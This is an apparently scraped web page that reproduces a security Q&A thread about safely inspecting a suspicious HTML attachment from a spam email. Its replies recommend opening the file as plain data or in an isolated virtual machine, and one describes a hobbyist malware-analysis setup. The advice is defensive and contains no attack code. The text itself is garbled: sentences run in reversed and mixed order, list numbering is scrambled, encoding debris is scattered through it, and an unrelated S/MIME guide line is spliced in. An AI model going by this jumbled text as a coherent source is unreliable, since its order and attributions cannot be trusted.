![]() If you are nervous about actually opening the e-mail, something like Lynx could probably be used.A step-by-step guide to installing a S/MIME certificate and setting up hosted S/MIME in Gmail. If you've already opened the e-mail and just not the attachment, then you could simply save the attachment. There is a very slim chance of issues if they happen to be targeting a VM vulnerability, but the chances of your particular questionable file rapidly identifying and targeting a suitable VM vulnerability to break sandbox are pretty close to nil unless you are being specifically targeted and even then it's probably a low likelihood. To be a little more thorough, you could use a VM to actually let it go and see what it does, but for simple checking, treating it as a data file and accessing it with data analysis tools should be safe. The key is to make sure you do not access it with anything which could automatically run something for you. ![]() The file can't magically run itself if you treat it directly as data and you should be able to examine the contents. The simplest approach would be to use direct HTTP access to save the file and open it in Notepad to examine the contents. Whenever he finishes working on a sample, he reboots with Clonezilla and restores the full-disk image. The PC is connected to the Internet through a separate network. html attachment check.Īfter installing the needed tools he takes a full-disk image using Clonezilla Live. I was talking to a colleague who performs malware analysis as a hobby and he told me about his setup, it might be different that what you might want for an occasional. The reason I have the whole setup is because I like to run the malware and see what it's trying to do. I check the changes to the OS using What Changed? and TrackWinstall. I usually run the malware and study memory usage, CPU load, listening ports, networking attempts. Then I can have all the fun I want on the VM itself. I copy files only in the direction Host -> VM, using a free ISO creator. I also take two snapshots with What Changed? and TrackWinstall. I have a snapshot saved for the VM after a fresh OS install. The email itself, before you open the attachment could try to exploit a vulnerability in your email clientįor this purpose, I have the following setup: HTML page with an embedded Flash file attempting to exploit a vulnerability in Flash PlayerĦ. HTML page with an embedded Java applet attempting to exploit a vulnerability in the JVMĥ. ![]() HTML page with JavaScript code attempting exploit a vulnerability in your browser.Ĥ. I would prefer to do it in a clean, un-networked environment, but in any case, I'll still be logging into my Gmail account to download the thing.ģ. I'm thinking a LiveCD or a VM would be a safe environment. Is there a safe way to go about downloading it to a sandboxed location and inspecting the contents? I'm at the beginning of a career shift into the security field, and I would love to pick apart this real world example of something potentially nasty and see how it ticks. I really want to know what's in that attachment. I know I should probably just mark this as spam and get on with my life, but my curiosity is getting the best of me. My guess is that it really is an HTML file, since Gmail claims the attachment is only 1K in size. An actual HTML file meant to be opened in a browser in a phishing attack.A nasty executable file masquerading as a simple HTML file, or.My first hunch was that it was probably one of the following: Attached to the email is a supposed HTML file. I received a pretty blatantly spammy email to my Gmail account.
0 Comments
Leave a Reply. |